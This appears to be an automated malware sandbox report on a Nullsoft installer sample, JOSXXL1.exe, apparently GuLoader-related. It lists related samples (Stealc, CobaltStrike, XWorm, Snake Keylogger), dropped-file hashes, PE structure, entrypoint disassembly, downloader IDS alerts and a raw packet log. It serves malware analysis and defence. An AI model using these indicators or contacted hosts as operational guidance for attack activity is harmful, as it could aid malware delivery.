                                                                                  37f463bf4616ecd445d4a1937da06e19GK059kPZ5B.exeGet hashmaliciousStealcBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  TP77MvSzt2.exeGet hashmaliciousStealcBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  ae67deafb5d9386fbca3d4d728d79651daaa42eef8086.exeGet hashmaliciousStealc, VidarBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  1GeaC4QnFy.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  OyPpyRRqd8.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  H33UCslPzv.exeGet hashmaliciousXWormBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                  C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll | Certificado FNMT-RCM.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
                                                                                  Produccion.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse
                                                                                  SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe | Get hash | malicious | GuLoader | Browse
                                                                                  SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe | Get hash | malicious | GuLoader | Browse
                                                                                  UMOWA_09.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse
                                                                                  UMOWA_09.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse
                                                                                  Payment Advice Note_Pdf.exe | Get hash | malicious | Azorult, GuLoader | Browse
                                                                                  Payment Advice Note_Pdf.exe | Get hash | malicious | GuLoader | Browse
                                                                                  Confirmation transfer AGS # 22-0024.exe | Get hash | malicious | GuLoader | Browse
                                                                                  Confirmation transfer AGS # 22-0024.exe | Get hash | malicious | GuLoader | Browse
                                                                                                      Process:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11776
                                                                                                      Entropy (8bit):5.655335921632966
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                      MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                      SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                      SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                      SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: Certificado FNMT-RCM.exe, Detection: malicious, Browse
                                                                                                      • Filename: Produccion.exe, Detection: malicious, Browse
                                                                                                      • Filename: SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe, Detection: malicious, Browse
                                                                                                      • Filename: SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe, Detection: malicious, Browse
                                                                                                      • Filename: UMOWA_09.BAT.exe, Detection: malicious, Browse
                                                                                                      • Filename: UMOWA_09.BAT.exe, Detection: malicious, Browse
                                                                                                      • Filename: Payment Advice Note_Pdf.exe, Detection: malicious, Browse
                                                                                                      • Filename: Payment Advice Note_Pdf.exe, Detection: malicious, Browse
                                                                                                      • Filename: Confirmation transfer AGS # 22-0024.exe, Detection: malicious, Browse
                                                                                                      • Filename: Confirmation transfer AGS # 22-0024.exe, Detection: malicious, Browse
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Process:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1409020
                                                                                                      Entropy (8bit):3.71736605454036
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:21P7FUCCnQvh+93/wP1zPHb5hl88oLWGk4+7PYfno+DaiIcC4:gCQZ+93/Q1zP7flyLnkEfno+DNIU
                                                                                                      MD5:5FACE8BE4B0588E347D791DB87BCE6E8
                                                                                                      SHA1:2AC3BEF878AF7119B401C1CA8EC83BF6A4EF9402
                                                                                                      SHA-256:8D06F457E594F4B32611FBB2E5550E7442504E2AA407B627AF49F203EBA5E843
                                                                                                      SHA-512:D6A59362477E13D5AF298320DCBC0F8D0ECAEC9C391855ABED4ECC69D168DD38D8F1FA5F44AE67B55EBF1771D321551CB238CB0421A4C93DDE90CD32E8328C0E
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Process:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):374900
                                                                                                      Entropy (8bit):2.280960262762324
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:bNFzfqxOSxM9xAWyQhTStOwqqWnf+3EQ+782Z5:BV6LmDpyQ9wIn8bYL3
                                                                                                      MD5:FD876F66CB55E8597AB2ADCB1715E24D
                                                                                                      SHA1:90DE8C19016E7121C2861CF748262A44F57C2DE0
                                                                                                      SHA-256:404E86068579D935C692F89EBB98EBA6D930A536B4833468C536F1A0273FDDE2
                                                                                                      SHA-512:CA8A1951D4013297A2168DB38027E8F9904838576AF4B59FAC09655F976C45966E58656038D51EBF0593A82F7A9B826276C65465CF8845FE299F7358D15F1C1C
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Process:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):402
                                                                                                      Entropy (8bit):4.310269764673079
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:hDVKJgrLT/qUl/HHjaTaGhSdWJ2ccMFMxMALLotLn:heg3T/qUNjlG48JGmL
                                                                                                      MD5:4EF1859A18FB4C5B61DB725AAFE27F90
                                                                                                      SHA1:D31A038EA086536F22BF7D64FF099AD5D8800706
                                                                                                      SHA-256:D21E0CD7A7C2E95FFCAFCD23F04D2A232729F672FBB47B7D0776ABB3229FBB0B
                                                                                                      SHA-512:1B9C8AE8B6FDC1D1BCAA69CB748C3CBEE764573D4DDBF40DD8D307B63365650D9B85E3EA386028F8DDBE32DA5237771D6996721107EED18CBA71E20D07BB5E7E
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:vacillate viklendes contemnible counterpropagandize replevining,azelate fortrydendes centrum heavenwardly misalign kokettens,signalanalyser skeformedes kyklops irredeemably filibusters unlobed fuchi unbonny tilkomnes sjapis alsine..tensive ophavsretsindehaveren ubehagene korrelaters.srinteresseomraaders brernes circumvolve nonsuit.tumbek haversacks hjrekant systemeringen russophilism labarums ogsaa.
                                                                                                      Process:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):275595
                                                                                                      Entropy (8bit):7.754632703695257
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:9nidKxAdInQvWBm+qEZpNPLpG2wdJ1Nj/7wUdPHbZrhqassD2RN0DsU:gUCCnQvh+93/wP1zPHb5hl88r
                                                                                                      MD5:4676EBA5220757447D27571E8299B3AE
                                                                                                      SHA1:B3895C58A55C480C330A642175923025D47EE198
                                                                                                      SHA-256:88D22420602D6EC710ED98BE4651416382BD598FEC5C0A1B29FE9606189D93E7
                                                                                                      SHA-512:027386BF7D50A8B0AE621A415EDDF00E321B7A871E058BF25031408C7E3E429446B49FF10497D31CF05EEAD7E06DB9704A779A78A97911DAA09B6FA3EA74EF91
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Process:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      File Type:GTA audio index data (SDT)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):275043
                                                                                                      Entropy (8bit):2.2851189268291714
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:xwxFmKCuH60CJ++DBpgfz/f/WpT7CiSKP4FMWYOSQotMddJ3toh6:YtCQ63az/GpqiSjWWfo279eh6
                                                                                                      MD5:21BDD59977EA7CD06C63391AA9FD189E
                                                                                                      SHA1:9CC5B83758407C6D78BD2A96E6A31533C640C524
                                                                                                      SHA-256:B301C24D700076375EAA2394A9E0B754DDAA6A6A7066E8B7AE6FFAEA259B03D4
                                                                                                      SHA-512:042B6B7234BAC120CFEFA13DB48E1EF116ADB1F9FE60120A815973E485987C01751F27F6482FDC6FDF84B005FA3CE359A9DC13BC49ACD255383D2B8CD5C10E6C
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Process:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):456817
                                                                                                      Entropy (8bit):2.2861700746844575
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:Up3Z9pSH0D11/iNlORIFbTYVN7kjQD/48cin2ij5RQq458mu0FnkLfmcJmiIMaDE:SpGH0Elc7mwkk2q5Yfu2nkL+c7wehb
                                                                                                      MD5:DEEA5D4F6617FE0772227FD43368936F
                                                                                                      SHA1:AE52FCB091DCE0118E79E4FF46F0A04BB25C350A
                                                                                                      SHA-256:268FCAE0EC44A3E572DFC0BF3C55306200687AA96ED484E50FAE4F1FDC400E04
                                                                                                      SHA-512:94573F2C11958E46A75009461FFE4F6CD00ED6C1CF4C5F02C942773262D2DB0311FD8778B47B418C27826039B5B7895440528AAEA80F0E3D5C5FCFD1FB4ECAE9
                                                                                                      Malicious:false
                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                      Entropy (8bit):7.856772626299688
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:JOSXXL1.exe
                                                                                                      File size:811'667 bytes
                                                                                                      MD5:fb24966daab46af066a7b7c041236de9
                                                                                                      SHA1:391bb0f3da952bbbf14b61b7f6c01175344be882
                                                                                                      SHA256:8e5d0c237ba87f5b445c7edcf6d5ea6071fb873c64b6431f4f98527461aac37d
                                                                                                      SHA512:7086d3a365f1fd90b26309ca87c70a872c10badc03a47e96997465c1e8db755d8de05c5321af6e7b53d566acb6193ded5b331f7232df22b4dad881a3533a764f
                                                                                                      SSDEEP:12288:XDGxeWd8KhMLxCTSr+lZbYk4z+pmUd0CP/TtybfkmvKAFfyhRY2ULwMaVZl:W3ddhMLiSKlGkZhVBy7BvHyhR3ULxe/
                                                                                                      TLSH:5D0512C1F5D0ECC2DC770CB19C39FA6256167D6E6C38061DFAAAB26D9177223206B41B
                                                                                                      Icon Hash:0d39254252426213
                                                                                                      Entrypoint:0x4033b6
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x567F8479 [Sun Dec 27 06:26:01 2015 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:7192d3773f389d45ebac3cc67d054a8a
                                                                                                      Instruction
                                                                                                      sub esp, 000002D4h
                                                                                                      push ebp
                                                                                                      push esi
                                                                                                      push 00000020h
                                                                                                      xor ebp, ebp
                                                                                                      pop esi
                                                                                                      mov dword ptr [esp+0Ch], ebp
                                                                                                      push 00008001h
                                                                                                      mov dword ptr [esp+0Ch], 0040A230h
                                                                                                      mov dword ptr [esp+18h], ebp
                                                                                                      call dword ptr [004080B4h]
                                                                                                      call dword ptr [004080B0h]
                                                                                                      cmp ax, 00000006h
                                                                                                      je 00007F44345FDFC3h
                                                                                                      push ebp
                                                                                                      call 00007F443460111Eh
                                                                                                      cmp eax, ebp
                                                                                                      je 00007F44345FDFB9h
                                                                                                      push 00000C00h
                                                                                                      call eax
                                                                                                      push ebx
                                                                                                      push edi
                                                                                                      push 0040A3B0h
                                                                                                      call 00007F443460109Bh
                                                                                                      push 0040A3A8h
                                                                                                      call 00007F4434601091h
                                                                                                      push 0040A39Ch
                                                                                                      call 00007F4434601087h
                                                                                                      push 00000009h
                                                                                                      call 00007F44346010ECh
                                                                                                      push 00000007h
                                                                                                      call 00007F44346010E5h
                                                                                                      mov dword ptr [0042A264h], eax
                                                                                                      call dword ptr [00408044h]
                                                                                                      push ebp
                                                                                                      call dword ptr [004082A8h]
                                                                                                      mov dword ptr [0042A318h], eax
                                                                                                      push ebp
                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                      push 000002B4h
                                                                                                      push eax
                                                                                                      push ebp
                                                                                                      push 00421708h
                                                                                                      call dword ptr [0040818Ch]
                                                                                                      push 0040A384h
                                                                                                      push 00429260h
                                                                                                      call 00007F4434600CD2h
                                                                                                      call dword ptr [004080ACh]
                                                                                                      mov ebx, 00435000h
                                                                                                      push eax
                                                                                                      push ebx
                                                                                                      call 00007F4434600CC0h
                                                                                                      push ebp
                                                                                                      call dword ptr [00408178h]
                                                                                                      Programming Language:
                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                      Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT          0x84bc           0xa0          .rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0x4f000          0x28410       .rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2b8         .rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x615e | 0x6200 | 41c79e199a2175acbe73d4712982d296 | False | 0.6625876913265306 | data | 6.4557374109402 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1370 | 0x1400 | 9cbedf8ff452ddf88e3b9cf6f80372a9 | False | 0.4404296875 | data | 5.102148788391081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20358 | 0x600 | 73e3da5d6c2dd1bec8a02d238a90e209 | False | 0.5149739583333334 | data | 4.09485328769633 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x24000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4f000 | 0x28410 | 0x28600 | 51b7894a0db615e33d0e483e70402f1b | False | 0.5889669601393189 | data | 6.83951124806165 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4f418 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.2257778303560866
RT_ICON | 0x5fc40 | 0x98dd | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9996422456750057
RT_ICON | 0x69520 | 0x730f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9982006450517739
RT_ICON | 0x70830 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.40985477178423235
RT_ICON | 0x72dd8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4603658536585366
RT_ICON | 0x73e80 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5559701492537313
RT_ICON | 0x74d28 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.5537003610108303
RT_ICON | 0x755d0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.33963414634146344
RT_ICON | 0x75c38 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.37283236994219654
RT_ICON | 0x761a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6551418439716312
RT_ICON | 0x76608 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.44623655913978494
RT_ICON | 0x768f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.49324324324324326
RT_DIALOG | 0x76a18 | 0x120 | data | English | United States | 0.5138888888888888
RT_DIALOG | 0x76b38 | 0x11c | data | English | United States | 0.6091549295774648
RT_DIALOG | 0x76c58 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x76d20 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x76d80 | 0xae | data | English | United States | 0.6264367816091954
RT_VERSION | 0x76e30 | 0x29c | data | English | United States | 0.5089820359281437
RT_MANIFEST | 0x770d0 | 0x33f | XML 1.0 document, ASCII text, with very long lines (831), with no line terminators | English | United States | 0.5547533092659447
DLL | Import
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GetDiskFreeSpaceW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-26T23:57:11.745999+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 61847 | 142.250.185.238 | 443 | TCP
2024-10-26T23:57:18.573757+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 61886 | 193.122.130.0 | 80 | TCP
2024-10-26T23:57:20.417495+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 61886 | 193.122.130.0 | 80 | TCP
2024-10-26T23:57:21.167832+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 61902 | 188.114.96.3 | 443 | TCP
2024-10-26T23:57:21.890371+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 61908 | 193.122.130.0 | 80 | TCP
2024-10-26T23:57:22.626862+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 61913 | 188.114.96.3 | 443 | TCP
2024-10-26T23:57:23.355007+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 61919 | 193.122.130.0 | 80 | TCP
2024-10-26T23:57:24.129743+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 61922 | 188.114.96.3 | 443 | TCP
2024-10-26T23:57:25.708387+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 61933 | 188.114.96.3 | 443 | TCP
2024-10-26T23:57:27.148944+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 61945 | 188.114.96.3 | 443 | TCP
2024-10-26T23:57:31.552767+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 61976 | 188.114.96.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                      Oct 26, 2024 23:57:15.606396914 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.606586933 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.606643915 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.606894970 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.606949091 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.607160091 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.607212067 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.719959974 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.720125914 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.720184088 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.720247984 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.720263004 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.720312119 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.720398903 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.720453978 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.720520020 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.720575094 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.721002102 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.721061945 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.723488092 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.723540068 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.723591089 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.723647118 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.723948956 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.724004030 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.724066973 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.724118948 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.764512062 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.764724016 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.764854908 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.764914989 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.765003920 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.765003920 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.837730885 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.838057995 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.838154078 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.838196039 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.838196039 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.838258982 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.838316917 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.838316917 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.838337898 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.838387966 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.838399887 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.838521004 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.841075897 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.841165066 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.841248035 CEST44361854142.250.181.225192.168.2.4
                                                                                                      Oct 26, 2024 23:57:15.841401100 CEST61854443192.168.2.4142.250.181.225
                                                                                                      Oct 26, 2024 23:57:15.841414928 CEST44361854142.250.181.225192.168.2.4
